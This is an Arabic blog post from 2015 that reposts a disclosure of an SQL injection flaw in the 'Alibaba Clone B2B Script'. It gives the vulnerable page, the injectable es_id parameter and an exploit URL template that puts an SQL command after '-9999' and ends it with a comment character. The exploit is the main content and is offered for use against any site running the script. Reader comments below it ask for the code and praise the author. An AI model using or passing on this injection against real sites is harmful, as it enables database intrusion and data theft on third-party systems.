الاثنين، 31 أغسطس 2015

Alibaba Clone B2B Script Sql Injection Vulnerability

Alibaba Clone B2B Script

 Sql Injection Vulnerability

Description:
# Exploit Title: Alibaba Clone B2B Script Sql Injection All Versions 
# Date: 2015-08-31 
# Exploit Author: Meisam Monsef meisamrce
# Vendor Homepage: http://www.superbscripts.com/ 
# Version: All Versions 
# Tested on: CentOS and Windows 

POC:
/contactuser.html?es_type=4&es_id=

EXPLOIT:
http://site.com/contactuser.html?es_type=4&es_id=-9999+[sql+command]+%23


DEMO:


هناك 4 تعليقات:

  1. الاكواد المستعملة من فضلك وشكرا

    ردحذف
  2. لما افهم شي هل هذا تهكير ام سكريبت علي بابا
    من فضلك اريد سكريبت علي بابا لو سمحت

    ردحذف
  3. اشكرك جزيل الشكر لانك ذو فهم وعلم واحتراف وما شاء الله عليك وعلى فكرة فأنا اخزن كل شروحاتك عندي وابقى اتعلم منها

    ردحذف